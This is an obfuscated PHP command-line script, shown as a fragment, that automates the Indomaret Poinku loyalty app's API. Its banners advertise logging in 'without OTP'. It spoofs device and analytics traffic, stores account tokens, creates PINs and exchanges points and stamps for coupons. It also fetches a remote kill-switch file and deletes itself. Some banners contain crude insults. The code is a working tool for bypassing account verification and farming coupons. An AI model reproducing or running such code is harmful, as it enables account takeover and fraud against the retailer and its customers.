  $cPDPt = trim(fgets(STDIN)); 
  goto sUm5u; 
  GGHhV: 
  $nPb0z = json_decode($Jk9cx, true); 
  goto N9Kna; 
  IzLeM: 
  echo "
"; 
  goto TjTjD; 
  crpcv: 
  $Ap1KM = json_decode($ofEkP, true); 
  goto vXlUB; 
  c9VHy: 
  $efQM2 = count($QRhbE) - 1; 
  goto JjOHD; 
  KaAiL: 
  $Y02JS = G1Wxt("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/pin/create-pin", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto F6EGi; 
  o4gad: 
  $zn5zd = $U0YgX; 
  goto qmkK5; 
  EZfFe: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"page_view","event_timestamp":" . $nb9cm . ","page_name":"home","page_urlpath":""},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto Adzo6; 
  am0nY: 
  $nb9cm = round(microtime(true) * 1000); 
  goto EZfFe; 
  cfUiS: 
  $D2zwh = "0"; 
  goto yRdKx; 
  gmL5u: 
  echo @zm6IC("green", " | WA 082176358295 \xa"); 
  goto SMCx_; 
  lLd10: 
  smSBj: 
  goto WYK2I; 
  GAzr5: 
  if (!($fUekS == '')) { 
    goto Js11p; 
  } 
  goto W5Geu; 
  N6c5f: 
  $mlMLt = $obc_G; 
  goto GPI3O; 
  cvg4O: 
  EKk1g: 
  goto mMwna; 
  nJiyB: 
  if (!($yy9BI < $DxrJr)) { 
    goto Eqo5q; 
  } 
  goto bxKdX; 
  uY1yn: 
  V7t6B: 
  goto PUFOJ; 
  Tgd35: 
  echo "\xa"; 
  goto vEQbd; 
  ptOzD: 
  print_r($zcN5u); 
  goto Mrs6i; 
  IBHxa: 
  if (!($fUekS == '')) { 
    goto AJ5_S; 
  } 
  goto HHfsx; 
  g3Opg: 
  echo @Zm6ic("nevy", "        AAMIIN "); 
  goto gO1cU; 
  cMm4X: 
  echo @Zm6Ic("green", "Masukkan OTP Anda : "); 
  goto DSAWn; 
  xsgCP: 
  $hdCXp = xOzB4(array(":"), $Ia9Ix)[1]; 
  goto i2TQW; 
  rNOFN: 
  echo @ZM6Ic("yellow", "Build By FERDY RAMADHAN "); 
  goto la6k6; 
  Vnumm: 
  $jTEU0; 
  goto fNtNy; 
  XFSNO: 
  $zcN5u = XOZb4(array("|"), $tqWr2)[0]; 
  goto pRwIq; 
  y5Csz: 
  $JaDCq = $PQA77; 
  goto wqRSd; 
  mMwna: 
  WfXbO: 
  goto OUrjF; 
  mQ4fU: 
  echo @Zm6IC("yellow", "| WA 082176358295 \xa"); 
  goto EcpCc; 
  OSZHw: 
  echo "\xa"; 
  goto lU4d2; 
  U2Uv6: 
  $w5ulg = str_replace("\xd", '', $TvVlh); 
  goto smjuE; 
  xUip9: 
  echo @zm6Ic("yellow", " - Silahkan Melakukan Transaksi Terlebih Dahulu\xa"); 
  goto uJSyf; 
  Zu6S2: 
  echo @zm6Ic("nevy", "Apakah Sudah Transaksi ? ( y / n ) : "); 
  goto gGCoG; 
  wvrQK: 
  echo "
"; 
  goto oZ7zX; 
  s2Asv: 
  $zn5zd = $U0YgX; 
  goto gVo9_; 
  xMsml: 
  $LgiFv = @$Ap1KM["data"]["information"]; 
  goto pe2QH; 
  a_izq: 
  echo @Zm6iC("yellow", "Poin Akun Anda : "); 
  goto MdYDc; 
  ehPqu: 
  $m5BZY = gGGr_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto UtozB; 
  grlZ3: 
  echo "\xa"; 
  goto X4lGn; 
  avNKg: 
  ds3qL: 
  goto F5gUC; 
  yqzNQ: 
  if (!($kp_uF == "1")) { 
    goto JKU8P; 
  } 
  goto P23f4; 
  GHAKe: 
  echo @zM6IC("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! 
"); 
  goto B90Go; 
  souSV: 
  Gq4tD: 
  goto q6jGB; 
  QKOt8: 
  $N0XGD = g8PF2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/points/me", $aY0el, $GOXkU, $mlMLt); 
  goto bs89A; 
  WmLIs: 
  $zn5zd = $U0YgX; 
  goto WQtAk; 
  erEEh: 
  $yy9BI++; 
  goto H3Rse; 
  nJynW: 
  echo shell_exec("xdg-open "https://barcode.tec-it.com/barcode.ashx?data="" . $WtCiL . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto n4l0E; 
  z87ev: 
  if ($z4sxX == "Diskon Rp 25.000 Klik Indomaret") { 
    goto Wa6Sr; 
  } 
  goto c1LdE; 
  Tg5cq: 
  goto wB2V7; 
  goto rpmN3; 
  QYNTd: 
  $zcN5u = XoZb4(array("|"), $wZnHP)[0]; 
  goto YrGWs; 
  penYb: 
  FMhwq: 
  goto j95ak; 
  o8_Bq: 
  print_r($zcN5u); 
  goto TmNrv; 
  eQwBm: 
  echo @ZM6Ic("yellow", "\xaOTP ANDA SALAH, SILAHKAN INPUT YANG BARU!!
\xa"); 
  goto IVQjo; 
  xwo3y: 
  echo "\xa"; 
  goto nRt6q; 
  yJWDH: 
  $wDisp = "{"couponId":"" . $Qa1_P . "","qty":1.0,"stampExchangeId":"" . $gCIzy . ""}"; 
  goto xkf3f; 
  zYL9T: 
  $jTEU0; 
  goto za0pO; 
  Gaiy0: 
  echo @ZM6IC("green", "Masukkan Nomor Anda    : "); 
  goto xM5qM; 
  L6ZvK: 
  echo @zm6ic("nevy", "Masukkan Username Mu : "); 
  goto OUMdr; 
  qE_1z: 
  $QRhbE = explode("\xa", @file_get_contents("mytoken")); 
  goto F1unt; 
  KRKGo: 
  goto PcWWE; 
  goto XW71U; 
  VB4AI: 
  goto CqA3L; 
  goto ABTny; 
  JKzQX: 
  echo "\xa"; 
  goto ugz9I; 
  hTCB6: 
  echo "\xa"; 
  goto kq9hY; 
  QCDzE: 
  $D18xv = @$H1g60["data"]["id"]; 
  goto wuvlF; 
  xjMrp: 
  $KbHJf = rand(1000000, 9999999); 
  goto FBtZN; 
  MxNlU: 
  $Jst1j = $aoIfK; 
  goto MKy2r; 
  OfOX3: 
  echo "
"; 
  goto Nmn6H; 
  El078: 
  to00G: 
  goto oqEpm; 
  qcX1a: 
  goto jwQwr; 
  goto P33EC; 
  OXnTa: 
  sfkUi: 
  goto EDut1; 
  tXds1: 
  $qq5tL = "2" . $gYG6P . "hg5454d21vc"; 
  goto j2b0I; 
  fs5BL: 
  $ogbF4 = "30"; 
  goto cKx4E; 
  tIM8g: 
  echo "\xa"; 
  goto TSJ4g; 
  YUJaT: 
  if (!($jTEU0 < $S8W9D)) { 
    goto bjdV_; 
  } 
  goto dLuPN; 
  QwhGW: 
  $ofEkP = CWAlZ("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/points/me/coupons/exchange", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto CpSRT; 
  LmE7p: 
  zP__f: 
  goto ynhnS; 
  VoEDH: 
  echo @ZM6Ic("nevy", "     YANG NYEBARIN SCRIPT INI 
"); 
  goto SyHHL; 
  zvS3t: 
  $ABmxY = @$owfHy["message"]; 
  goto SzCcE; 
  dFRET: 
  $qtgR3 = "0"; 
  goto iAKfs; 
  VPvQq: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto lSP17; 
  rmeAQ: 
  if ($BeKks == "Diskon Rp 25.000 Klik Indomaret") { 
    goto DNYaq; 
  } 
  goto Q4vMp; 
  n4l0E: 
  shell_exec("start chrome "https://barcode.tec-it.com/barcode.ashx?data="" . $WtCiL . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto uDTHe; 
  Ozv31: 
  $D2zwh++; 
  goto v1iyI; 
  wvic1: 
  $zcN5u = xOzB4(array("|"), $wZnHP)[0]; 
  goto BX_qL; 
  gIKVK: 
  $odGGi = $kCT0W . "mbLQpe"; 
  goto We_ec; 
  mvNd_: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"page_view","event_timestamp":" . $nb9cm . ","page_name":"verification","page_urlpath":""},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_ip_address":"127.0.0.1"}}]}"; 
  goto VdRrs; 
  BVsui: 
  die; 
  goto cvg4O; 
  jYqv2: 
  $jTEU0; 
  goto qb0N_; 
  iT6C0: 
  H2PPC: 
  goto ig8Qg; 
  E7eXl: 
  $D2zwh; 
  goto OlRzX; 
  lM2XZ: 
  $wDisp = "{"fid":"" . $odGGi . "","appId":"1:998816605328:android:" . $aY0el . "","authVersion":"FIS_v2","sdkVersion":"a:17.0.0"}"; 
  goto jlEpj; 
  ayHIl: 
  echo "
"; 
  goto O0Oil; 
  gylcc: 
  echo @zM6Ic("nevy", " Silahkan Hubungi Creator Untuk Verifikasi https://wa.me/6282176358295\xa
"); 
  goto GVDB9; 
  Jfbgp: 
  $tqWr2 = $zvt88[$yy9BI]; 
  goto KZ3My; 
  EI4lL: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto ZKo9R; 
  Pdyfx: 
  echo "
"; 
  goto nFrYj; 
  U3GMQ: 
  $w5ulg = str_replace("\xd", '', $TvVlh); 
  goto V3qBg; 
  BmMuE: 
  echo @zm6ic("yellow", "Nama Kuponnya  : "); 
  goto yNbnX; 
  LNnsq: 
  $cod3H = fq6w0(); 
  goto xW7i4; 
  MTsVB: 
  echo "
"; 
  goto b371k; 
  TDGwf: 
  echo "
"; 
  goto LihqS; 
  WLUFd: 
  echo "\xa
"; 
  goto a4SB4; 
  SAvQe: 
  echo "Mulai Baris Ke : "; 
  goto s6kmZ; 
  Xuq79: 
  $XTuz1 = G1WXt("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/stamps/me/coupons/exchange", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto G3IfU; 
  AwDD1: 
  $BW_8H = @$owfHy["data"]["content"][$dQ8Tp]["description"]; 
  goto kAmOU; 
  cZsTg: 
  $tqWr2 = $zvt88[$yy9BI]; 
  goto iqj0r; 
  QxYhI: 
  $nb9cm = round(microtime(true) * 1000); 
  goto rIaU9; 
  WuLs0: 
  echo "\xa"; 
  goto ECJHz; 
  pkmY4: 
  $yJiD4 = @$owfHy["data"][$qtgR3]["districtName"]; 
  goto IR_bg; 
  RDVGv: 
  $Jk9cx = g8pF2("https://edtsapp.indomaretpoinku.com/configuration/apix-1502-api/mobile/sy-app-version/get-version-key/ANDROID", $aY0el, $GOXkU, $mlMLt); 
  goto adT9K; 
  HCxli: 
  PcWWE: 
  goto kRYuQ; 
  ynhnS: 
  $UHj7C = G8pF2("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/coupons?unpaged=true", $aY0el, $GOXkU, $mlMLt); 
  goto yyp1X; 
  deoKi: 
  rHrIJ("Kupon Poinku new.txt", $L9Nzh); 
  goto MVc4v; 
  GzPT0: 
  echo "\xa"; 
  goto iosF0; 
  VDs_x: 
  $efQM2 = count($QRhbE) - 1; 
  goto OUYab; 
  tx212: 
  jh2P0: 
  goto SYN5I; 
  sVbAt: 
  echo "\xa"; 
  goto P5yoE; 
  p9NyH: 
  $wDisp = ''; 
  goto dqjxO; 
  To2Qr: 
  echo @Zm6ic("nevy", $ABmxY); 
  goto OYBJA; 
  YNjDv: 
  $gCIzy = @$owfHy["data"]["content"][$dQ8Tp]["stampExchangeId"]; 
  goto epp07; 
  jgsP1: 
  if (!($fUekS == '')) { 
    goto jh2P0; 
  } 
  goto AQeBK; 
  tDK_A: 
  $zn5zd = substr_replace($GiPr2, "0", 0, 2); 
  goto ACpFN; 
  juo3c: 
  echo $yy9BI . ". "; 
  goto ZoliY; 
  c6kVn: 
  echo "
"; 
  goto ZVOO3; 
  QFsa0: 
  $Jk9cx = G8pF2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/reminders/me", $aY0el, $GOXkU, $mlMLt); 
  goto nof22; 
  p1x_3: 
  $D18xv = @$owfHy["data"][0]["id"]; 
  goto Xt3c5; 
  dd0D6: 
  $PKr5B = @$lImQC["data"]["content"][15]["couponName"]; 
  goto zqUTx; 
  y0A3r: 
  echo @zM6Ic("red", "KODE MU SALAH JON!!!\xa"); 
  goto WTQQC; 
  rWbmM: 
  h93oq: 
  goto c5N7a; 
  VYZr6: 
  goto pfdwZ; 
  goto h9f4o; 
  vxIYx: 
  @unlink("mytoken"); 
  goto tX9Oi; 
  Mrs6i: 
  echo "\xa"; 
  goto CDlgR; 
  SPzsL: 
  goto dGfMJ; 
  goto Akwg1; 
  QwxVQ: 
  echo "
"; 
  goto Uz1oe; 
  vPKzt: 
  echo @ZM6Ic("red", "=====================================================\xa"); 
  goto uk6Jf; 
  eMkRf: 
  echo "
"; 
  goto J3y2E; 
  ZKo9R: 
  $BcbF3 = @$Ap1KM["data"]["phoneNumber"]; 
  goto fmZo2; 
  s4XZg: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto Ysu6A; 
  f0C6o: 
  echo "
"; 
  goto XfE0J; 
  F21Gw: 
  aKEU_: 
  goto l7zY3; 
  OO8Xp: 
  $R_bYC = @$nPb0z["data"]["id"]; 
  goto j91S7; 
  janeS: 
  lQjR6("mytoken poin di atas " . $VW5Jc, $zn5zd, $mlMLt); 
  goto jLvP7; 
  MlM4g: 
  echo @zm6ic("green", "Nomor HP Anda : "); 
  goto ZSznK; 
  c0k15: 
  $xT15V = G8PF2("https://edtsapp.indomaretpoinku.com/%2Floyalty%2Fapix-1502-api%2Fmobile%2Fcoins%2Fprizes%2FGOFRESH2022%2Fme", $aY0el, $GOXkU, $mlMLt); 
  goto aCzSY; 
  DvkOx: 
  goto V9iZ0; 
  goto d1cn3; 
  zn1MU: 
  $Pud0o = trim(file_get_contents("https://raw.githubusercontent.com/csaojkcsajcsjnjkscanjkncjkslnj/adfadfadvsgdfggfsgsgfsaf/main/makin")); 
  goto A2sIk; 
  M2RvH: 
  mkdir("/storage/emulated/0/Android", 0777, true); 
  goto OA4m1; 
  k6NcS: 
  $t2tnx = @$owfHy["data"][0]["recipientPhoneNumber"]; 
  goto Yu0OE; 
  GHPjX: 
  @unlink("more"); 
  goto rWbmM; 
  WFREJ: 
  $Ap1KM = json_decode($ofEkP, true); 
  goto SepDd; 
  h_PCX: 
  echo "\xa"; 
  goto kXhiU; 
  Y6Wfi: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . "","pinCode":"" . $earOL . ""}"; 
  goto sNpwz; 
  aHEZg: 
  echo @ZM6IC("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto T9KaD; 
  cjw3d: 
  ebnNp: 
  goto gy5bR; 
  ztfZm: 
  echo @zM6iC("yellow", "Status Cek Kupon : "); 
  goto iMEyj; 
  HCWyL: 
  ObwZf: 
  goto ahhce; 
  g06r9: 
  @unlink("/storage/emulated/0/Android/your"); 
  goto rIUhZ; 
  pqxuM: 
  $BcbF3 = @$Ap1KM["data"]["phoneNumber"]; 
  goto eaVNA; 
  ldlWE: 
  hJDqH: 
  goto oEIK5; 
  YFMSc: 
  echo @zm6ic("nevy", "Tekan Enter Untuk Lanjut : "); 
  goto rn8GJ; 
  g12c3: 
  echo @ZM6ic("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto HuxLa; 
  ZWgtU: 
  $Jk9cx = G8PF2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto utu6T; 
  soKJc: 
  znG5V: 
  goto nRboz; 
  pWpjD: 
  echo @Zm6IC("nevy", $J0Fkh); 
  goto qf0ET; 
  pXPoJ: 
  echo "
"; 
  goto TaqSA; 
  qNcWT: 
  echo @zm6IC("yellow", "| WA 082176358295 
"); 
  goto A5A7y; 
  pKI5I: 
  $mlMLt = $obc_G; 
  goto kkk3x; 
  cw7l6: 
  $XDyMm = @$Ap1KM["data"]["balance"]; 
  goto U8GHB; 
  YrlkR: 
  $gYG6P = rand(1000, 9999); 
  goto hBtwy; 
  QlDQy: 
  $KMaT7 = @$owfHy["data"]["content"][$dQ8Tp]["type"]; 
  goto ZMAxB; 
  tcaWh: 
  goto zbRuM; 
  goto yjYvF; 
  SyHHL: 
  echo @Zm6ic("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! 
"); 
  goto tAwBR; 
  qsntQ: 
  $bDQe4 = "10000000"; 
  goto ahhi3; 
  MYWMI: 
  echo @Zm6ic("nevy", " | Script IDM LOGIN POINKU CEK KUPON TANPA OTP\xa"); 
  goto P7mQo; 
  j9DK2: 
  echo @zM6IC("yellow", " 2 . Login Poinku Tanpa OTP + Pecahin
"); 
  goto cLVAj; 
  WYK2I: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"page_view","event_timestamp":" . $nb9cm . ","page_name":"PIN activation","page_urlpath":""},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto qg2i3; 
  e2ITP: 
  $iElqk = g1wXT("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/is-pin-exist-by-phone-number", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto Xo2nr; 
  oj_o6: 
  echo "
"; 
  goto rMiHp; 
  mOztK: 
  die; 
  goto yr7dZ; 
  aZAsM: 
  echo "
"; 
  goto JFR6I; 
  CSrk4: 
  $ZNU2M = @$owfHy["data"]["content"][$D2zwh]["couponName"]; 
  goto le12b; 
  OR4t6: 
  LRKWE: 
  goto mzjL3; 
  n6abN: 
  goto qdNHN; 
  goto kT9ly; 
  ktiz3: 
  $QRhbE = explode("\xa", @file_get_contents("forceclose")); 
  goto XRDCd; 
  qkXoE: 
  if (!($D2zwh < $ogbF4)) { 
    goto yj7_K; 
  } 
  goto HLO5p; 
  nOS4c: 
  ihbeD: 
  goto MURce; 
  ziRG0: 
  echo "\xa"; 
  goto yHo5h; 
  JVGPU: 
  echo "\xa"; 
  goto k3n5R; 
  ZjDi9: 
  @unlink("poinhp.php"); 
  goto EiZOM; 
  HrdBY: 
  if (!($fUekS == '')) { 
    goto cz23r; 
  } 
  goto Dys8M; 
  UtozB: 
  $wDisp = "{"appInstanceId":"" . $WYrgv . "","appVersion":"3.13.0","countryCode":"ID","analyticsUserProperties":{},"appId":"1:998816605328:android:" . $aY0el . "","platformVersion":"28","timeZone":"Asia\/Jakarta","sdkVersion":"21.0.1","packageName":"mypoin.indomaret.android","appInstanceIdToken":"" . $YYbml . "","languageCode":"id-ID","appBuild":"104"}"; 
  goto P2_cR; 
  VCtcL: 
  $Ap1KM = json_decode($N0XGD, true); 
  goto kgTcS; 
  TIpPO: 
  echo @zM6ic("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto J5Yc7; 
  xSHkO: 
  $zvt88 = $QRhbE; 
  goto Jfbgp; 
  FBtZN: 
  $gYG6P = rand(1000, 9999); 
  goto l1S9t; 
  noF8q: 
  echo "\xa"; 
  goto bnog9; 
  cAIMe: 
  echo "\xa"; 
  goto vtZNG; 
  b371k: 
  echo @zm6iC("purple", "ID    : "); 
  goto KZvKT; 
  ZJSHQ: 
  $owfHy = json_decode($upOL9, true); 
  goto EMbAe; 
  iAKfs: 
  $CdOss = "10000000"; 
  goto RB7vh; 
  m1w6_: 
  $PGTBJ = str_replace("
", '', $zcN5u); 
  goto N1Fy0; 
  Fg3lZ: 
  $QRhbE = explode("
", @file_get_contents("mytoken")); 
  goto U0V1s; 
  UACxr: 
  echo $jTEU0; 
  goto Gg0l9; 
  KIXqn: 
  echo @zm6IC("nevy", $WtCiL); 
  goto bsyt4; 
  j91S7: 
  $p4iky = @$nPb0z["data"]["memberId"]; 
  goto s7gJN; 
  jG_Zk: 
  echo "
"; 
  goto NcukH; 
  OzIsi: 
  $BcbF3 = @$Ap1KM["data"]["phoneNumber"]; 
  goto C5uyC; 
  MTZD5: 
  $SR3ui = @$owfHy["data"]["content"][$D2zwh]["couponCode"]; 
  goto pg4Im; 
  CSX6x: 
  echo @ZM6Ic("nevy", "     YANG NYEBARIN SCRIPT INI 
"); 
  goto POucJ; 
  mGdhE: 
  $VW5Jc = trim(fgets(STDIN)); 
  goto qV_iI; 
  zAuJD: 
  $zcN5u = Xozb4(array("|"), $wZnHP)[0]; 
  goto CiT9u; 
  mBoJz: 
  $wlJRC = XoZB4(array("|"), $wZnHP)[1]; 
  goto bim6t; 
  U3tV5: 
  $DxrJr = "100000000000000000"; 
  goto Ecn2N; 
  l7zY3: 
  echo "
"; 
  goto o7hXR; 
  FpdUn: 
  if (!($yy9BI < $DxrJr)) { 
    goto OQhff; 
  } 
  goto G_E8D; 
  ganFQ: 
  @unlink("poinhp.php"); 
  goto FgEJz; 
  MOYQn: 
  print_r($zvt88); 
  goto aIbLu; 
  cIVmT: 
  $wlJRC = xOzb4(array("|"), $wZnHP)[1]; 
  goto kiK8R; 
  vunz9: 
  $owfHy = json_decode($Jk9cx, true); 
  goto RBPjd; 
  Hwq1l: 
  $v1ZMX = str_replace("
", '', $wPFxB); 
  goto ubtTf; 
  Syh5j: 
  hAy4Q: 
  goto FaMo7; 
  Zcbgi: 
  echo @Zm6iC("nevy", $SR3ui); 
  goto xwo3y; 
  Ssnqn: 
  echo "\xa"; 
  goto xydrh; 
  m3Qnm: 
  @unlink("poinhp.php"); 
  goto eFzZO; 
  vxM93: 
  echo @Zm6IC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto q0Ft1; 
  zlztx: 
  die; 
  goto TDRtd; 
  luIKU: 
  $aY0el = $v1ZMX; 
  goto Grsq5; 
  RTSxC: 
  $Ap1KM = json_decode($xT15V, true); 
  goto tJQnU; 
  KmU4I: 
  dvsNz: 
  goto sHvzX; 
  l6uEH: 
  $efQM2 = count($QRhbE) - 1; 
  goto rEF_Z; 
  lGCjP: 
  Qcupn: 
  goto ZZutb; 
  PT110: 
  $jTEU0; 
  goto GGol7; 
  tb6FY: 
  VbZ2i: 
  goto p61aQ; 
  PUv3V: 
  echo "
"; 
  goto xhOCn; 
  FpdCf: 
  echo @Zm6Ic("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto ULTAl; 
  XniUI: 
  if ($ZNU2M == '') { 
    goto SyMwb; 
  } 
  goto NI96b; 
  A1ij4: 
  $upOL9 = G8pF2("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/coupons?unpaged=true", $aY0el, $GOXkU, $mlMLt); 
  goto ZJSHQ; 
  Mr9wz: 
  $w5ulg = str_replace("\xd", '', $TvVlh); 
  goto Ca_8z; 
  kiK8R: 
  $U0YgX = str_replace("
", '', $zcN5u); 
  goto jdGHB; 
  e3Es2: 
  if ($J2jGQ == "Diskon Rp 25.000 Klik Indomaret") { 
    goto poXHB; 
  } 
  goto vGFvF; 
  jWTaT: 
  @unlink("more"); 
  goto TlZVo; 
  sQzl_: 
  $xp_1p = "indo.txt"; 
  goto nbiw6; 
  sZ35R: 
  echo @Zm6ic("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! \xa"); 
  goto kPWys; 
  QtHtQ: 
  $U0YgX = str_replace("
", '', $zcN5u); 
  goto u2Iln; 
  vZLPg: 
  $v1ZMX = str_replace("\xd", '', $wPFxB); 
  goto YRYVy; 
  PjzOJ: 
  echo "\xa"; 
  goto tDK_A; 
  kz8l7: 
  $dQ8Tp = trim(fgets(STDIN)); 
  goto uXokT; 
  q0Ft1: 
  @unlink("poinhp.php"); 
  goto Ga713; 
  OnfYe: 
  rhRij("Kupon Poinku new.txt", $PEd4h); 
  goto y0e5f; 
  KhDEm: 
  echo "\xa"; 
  goto zEKm4; 
  Zt6t6: 
  echo "
"; 
  goto gCa6F; 
  jpuIB: 
  echo @zM6Ic("purple", $fZ2bz); 
  goto kO9o0; 
  gHwT9: 
  if (!($fUekS == '')) { 
    goto cXIKR; 
  } 
  goto NQMsn; 
  Y7JQT: 
  $jTEU0; 
  goto Mt1UZ; 
  faEcm: 
  Fh1k_: 
  goto nJiyB; 
  QT4Zl: 
  $XTuz1 = g1Wxt("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/customer-address/postal-code", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto oEbC2; 
  fdNlj: 
  $WtCiL = @$Ap1KM["data"]["couponCode"]; 
  goto xMsml; 
  l7_E_: 
  echo "
"; 
  goto YFMSc; 
  Pjpiq: 
  echo @zM6IC("yellow", " 5 . Tukar Poin\xa"); 
  goto oH2Jv; 
  hD5a6: 
  $jTEU0 = trim(fgets(STDIN)); 
  goto gECUy; 
  tJomU: 
  $owfHy = json_decode($upOL9, true); 
  goto fOkfz; 
  I58TZ: 
  se_Kh: 
  goto EpWcu; 
  FuYJt: 
  $aY0el = $v1ZMX; 
  goto T8ERT; 
  FOVdB: 
  $nb9cm = round(microtime(true) * 1000); 
  goto GiiQv; 
  ayiza: 
  $Bz8Et = @$owfHy["data"][0]["postalCode"]["postalCode"]; 
  goto rV1X4; 
  KsSFo: 
  if (!($zcN5u == '')) { 
    goto lUvmA; 
  } 
  goto pjVQI; 
  ZVQhU: 
  $m5BZY = Gggr_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto HH90U; 
  M4ZDE: 
  echo @zM6iC("green", "Ada Ayam... Yuk Pecahin !!"); 
  goto N6E3V; 
  MwsHo: 
  $wDisp = "{"keyword":"" . $ip0vw . ""}"; 
  goto Ip1aE; 
  N0fHh: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"click_link","event_timestamp":" . $nb9cm . ","link_label":"Selesai"},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto s0too; 
  xWUEy: 
  e81aM: 
  goto dEYI8; 
  p4P9K: 
  die; 
  goto op03J; 
  vAFZI: 
  $v1ZMX = str_replace("\xd", '', $wPFxB); 
  goto I_qlq; 
  wCzt2: 
  echo "
"; 
  goto n68gs; 
  jgBkc: 
  XfMNS: 
  goto UvoZT; 
  uujgh: 
  $Jk9cx = e6TPN("https://firebase-settings.crashlytics.com/spi/v2/platforms/android/gmp/1:998816605328:android:" . $aY0el . "/settings?instance=a291cbe808f666683ac167ea58393c709528e4f6&build_version=104&display_version=3.13.0&source=4", $aY0el); 
  goto mPz3m; 
  sw1Yf: 
  $Ap1KM = json_decode($xT15V, true); 
  goto cw7l6; 
  J5SJE: 
  $Qa1_P = @$owfHy["data"]["content"][$dQ8Tp]["couponId"]; 
  goto kiloP; 
  MyAZJ: 
  $U0YgX = str_replace("
", '', $zcN5u); 
  goto QM3hr; 
  zlfMJ: 
  if ($ZNU2M == '') { 
    goto IiPZc; 
  } 
  goto jRg_C; 
  ZzJEY: 
  echo "
"; 
  goto tHryq; 
  RgM1e: 
  echo @ZM6IC("nevy", "[14] {$S02nx} \xa  > {$Q8u1Y} 

"); 
  goto x8Bj2; 
  NEtRK: 
  function rlM6E($FK_yc, $bQedf, $zn5zd) 
  { 
    goto WAITr; 
    h1wA8: 
    fputs($FhLCi, "{$zn5zd} | {$bQedf}
"); 
    goto Io9Zc; 
    WAITr: 
    $FhLCi = fopen($FK_yc, "a"); 
    goto h1wA8; 
    Io9Zc: 
    fclose($FhLCi); 
    goto nSdqB; 
    nSdqB: 
  } 
  goto SrD9A; 
  AEHyE: 
  echo "
"; 
  goto TZYFr; 
  M10jD: 
  $QRhbE = explode("
", @file_get_contents("forceclose")); 
  goto ifSLw; 
  JPlU1: 
  $earOL = $sONlZ; 
  goto W0caM; 
  wlYZy: 
  $m0f8X = explode("\xa", @file_get_contents("mytoken")); 
  goto b6FwC; 
  PSf1q: 
  $cQFRW = json_decode($ofEkP, true); 
  goto gScoP; 
  uMLhp: 
  echo @ZM6ic("nevy", " | Script IDM LOGIN POINKU TANPA OTP
"); 
  goto IuO51; 
  rV1X4: 
  $pugmZ = @$owfHy["data"][0]["postalCode"]["postalCodeId"]; 
  goto RdjY_; 
  tXal_: 
  $jTEU0 = trim(fgets(STDIN)); 
  goto EUIiI; 
  e08Bo: 
  echo "
"; 
  goto QlV8Y; 
  UlQV_: 
  echo @zM6iC("nevy", $YXsOG); 
  goto eqyZ2; 
  rY3kD: 
  $t2tnx = @$owfHy["data"][0]["recipientPhoneNumber"]; 
  goto wTOTz; 
  uNQ8P: 
  $mYT0v["text"] = $YXsOG; 
  goto VrZaE; 
  k0I3d: 
